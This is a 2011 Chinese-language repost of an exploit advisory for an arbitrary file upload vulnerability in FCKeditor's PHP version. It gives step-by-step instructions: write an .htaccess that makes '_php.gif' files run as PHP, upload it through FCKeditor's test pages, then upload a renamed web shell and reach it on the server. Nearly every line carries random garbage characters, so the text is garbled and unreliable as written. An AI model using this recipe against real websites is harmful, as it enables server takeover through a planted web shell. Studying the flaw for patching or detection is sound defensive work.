FCKeditor所有php版本Upload上传漏洞: Q; n. }- ^) {- G: F& O: F( R
作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:07
6 P) B% {; y9 l9 _2 |减小字体 增大字体
8 y' w0 s0 d& [& ?+ w/ k2 h1 W[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability
" ?2 {/ E& D1 X; w6 r2 G[+] Date: 20114 z+ R! u% ~$ o$ U
[+] Author : sinesafe.cn
/ u7 n9 R: d! k" |- Q# V! k% w[+] Website : WwW.sinesafe.cn
7 g7 y, F& `0 l8 L———————————————————
! U, j. E, b+ u9 c: h1.create a htaccess file:
8 U$ @% P( X8 jcode:. M& I T) g! a- U& V0 O, e
<FilesMatch “_php.gif”>$ t% ^: P$ \& n/ ^) c" w& S; b
SetHandler application/x-httpd-php5 X9 o. h3 g0 L, d3 v |& n
</FilesMatch>( _) d( c9 l3 E! V6 U
; @: v( J; h* s a+ X# W2.Now upload this htaccess with FCKeditor.! q; |$ @! s: m8 \5 N3 e
: L7 v7 v b8 R( X) x
http://www.sinesafe.cn/FCKeditor ... er/upload/test.html
+ w0 b& o0 w: \1 A/ c8 y* S' c6 {" u6 \+ V$ K( W5 G
http://www.sinesafe.cn/FCKeditor ... onnectors/test.html
! u% F+ L( s, W/ _$ @5 D: n6 m' W9 F" T7 C- N' G
———————————————————————————————-
7 I3 D/ b9 ^4 g, q' b9 r0 \' i8 t6 ]; F3.Now upload shell.php.gif with FCKeditor.
7 r7 E8 S% {! r# v: ?9 a O9 _4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.5 L7 e+ @- p2 G' m5 `% l4 V3 P
5.http://www.sinesafe.cn/anything/shell_php.gif: k* y" `# h A2 l6 ]( Z
6.Now shell is available from server. |
6 \" x1 U; N Y
$ l+ w& m0 j2 q6 P2 K) Y+ G' c( `
. F9 h9 I4 E" v- C! J/ O |